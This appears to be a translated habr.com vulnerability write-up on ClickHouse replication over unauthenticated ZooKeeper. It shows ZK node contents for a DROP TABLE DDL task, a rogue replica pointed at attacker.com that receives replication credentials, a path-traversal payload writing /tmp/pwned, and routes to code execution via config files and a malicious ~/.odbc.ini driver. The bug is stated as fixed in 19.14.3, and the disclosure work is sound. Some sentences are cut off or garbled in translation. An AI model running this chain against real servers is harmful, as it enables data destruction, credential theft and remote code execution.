This article will be a story about one very specific vulnerability in the ClickHouse replication protocol, and will also show how you can expand the attack plane.
ClickHouse is a database for storing large amounts of data, most often more than one replica is used. Clustering and replication in ClickHouse are built on top of
The default ZK installation does not require authentication, so thousands of ZK servers used to configure Kafka, Hadoop, ClickHouse are publicly available.
To reduce the attack plane, you should always configure authentication and authorization when installing ZooKeeper
There are of course some Java-based deserializations, but imagine that an attacker could read and write to the ZooKeeper used for ClickHouse replication.
When configured in cluster mode, ClickHouse supports distributed queries /clickhouse/task_queue/ddl
.
For example, you create a node /clickhouse/task_queue/ddl/query-0001
with content:
version: 1
query: DROP TABLE xxx ON CLUSTER test;
hosts: ['host1:9000', 'host2:9000']
and after that, on the host1 and host2 cluster servers, the test table will be deleted. DDL also supports running CREATE/ALTER/DROP queries.
Sound scary? But where can an attacker get server addresses?
CREATE TABLE foobar
(
`action_id` UInt32 DEFAULT toUInt32(0),
`status` String
)
ENGINE=ReplicatedMergeTree(
'/clickhouse/tables/01-01/foobar/', 'chXX')
ORDER BY action_id;
nodes will be created columns ΠΈ metadata.
Content /clickhouse/tables/01/foobar/replicas/chXX/hosts:
host: chXX-address
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: http
Is it possible to merge data from this cluster? Yes, if the replication port (TCP/9009
) on server chXX-address
the firewall will not be closed and authentication for replication will not be configured. How to bypass authentication?
An attacker can create a new replica in the ZK by simply copying the contents from /clickhouse/tables/01-01/foobar/replicas/chXX
and changing the value host
.
Content /clickhouse/tables/01-01/foobar/replicas/attacker/host:
host: attacker.com
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: http
Then you need to tell the rest of the replicas that there is a new block of data on the attacker's server that they need to pick up - a node is created in ZK /clickhouse/tables/01-01/foobar/log/log-00000000XX
(XX monotonically increasing counter, which must be greater than the last one in the event log):
format version: 4
create_time: 2019-07-31 09:37:42
source replica: attacker
block_id: all_7192349136365807998_13893666115934954449
get
all_0_0_2
where source_replica β the name of the attacker's replica created in the previous step, block_id β identifier of the data block, get - "get block" command (and
Further, each replica reads a new event in the log and goes to the server controlled by the attacker to receive a data block (the replication protocol is binary, it works over HTTP). Server attacker.com
will receive requests:
POST /?endpoint=DataPartsExchange:/clickhouse/tables/01-01/default/foobar/replicas/chXX&part=all_0_0_2&compress=false HTTP/1.1
Host: attacker.com
Authorization: XXX
where XXX is the authentication data for replication. In some cases, this may be an account with access to the database via the main ClickHouse protocol and the HTTP protocol. As you have seen, the attack plane becomes critically large because the ZooKeeper used for replication was left without authentication configured.
Let's look at the function for getting a block of data from a replica, it is written with full confidence that all replicas are under proper control and there is trust between them.
replication processing code
The function reads a list of files, then their names, sizes, contents, and then writes them to the file system. It is worth separately describing how data is stored in the file system.
There are several subdirectories in /var/lib/clickhouse
(default storage directory from config file):
flags - write directory
tmp β directory for storing temporary files;
user_files - operations with files in requests are limited to this directory (INTO OUTFILE and others);
metadata - sql files with table descriptions;
preprocessed_configs β processed derived configuration files from /etc/clickhouse-server
;
date - the actual directory with the data itself, in this case, for each database, a separate subdirectory is simply created here (for example /var/lib/clickhouse/data/default
).
For each table, a subdirectory is created in the database directory. Each column is a separate file depending on
action_id.bin
action_id.mrk2
checksums.txt
columns.txt
count.txt
primary.idx
status.bin
status.mrk2
The replica expects to receive files with the same names when processing a data block and does not check them in any way.
The attentive reader has probably already heard about the unsafe file_name concatenation in the function WriteBufferFromFile
. Yes, this allows the attacker to write arbitrary content to any file on the file system with user rights clickhouse
. To do this, the replica controlled by the attacker must return the following response to the request (line breaks have been added for ease of understanding):
x01
x00x00x00x00x00x00x00x24
../../../../../../../../../tmp/pwned
x12x00x00x00x00x00x00x00
hellofromzookeeper
and after concatenation ../../../../../../../../../tmp/pwned
file will be written /tmp/pwned with content hellofromzookeeper.
There are several options for turning the ability to write files into remote code execution (RCE).
External Dictionaries in RCE
In older versions, the ClickHouse settings directory was stored with user rights clickhouse default. Settings files are XML files that the service reads at startup and then caches in /var/lib/clickhouse/preprocessed_configs
. When changes are made, they are reread. If you have access to /etc/clickhouse-server
the attacker can create his own root
.
ODBC to RCE
When a package is installed, a user is created clickhouse
, while not creating its home directory /nonexistent
. However, when using external dictionaries, or for other reasons, administrators create a directory /nonexistent
and give the user clickhouse
write access to it (SSZB! approx. translator).
ClickHouse supports odbc-bridge
, so it is no longer possible to specify the path to the driver from the request. But can an attacker write to the home directory using the vulnerability described above?
Let's create a file ~/.odbc.ini
with content like this:
[lalala]
Driver=/var/lib/clickhouse/user_files/test.so
then on startup SELECT * FROM odbc('DSN=lalala', 'test', 'test');
library will be loaded test.so
and received by RCE (thanks
These and other vulnerabilities have been fixed in ClickHouse 19.14.3. Take care of your ClickHouse and ZooKeepers!
Source: habr.com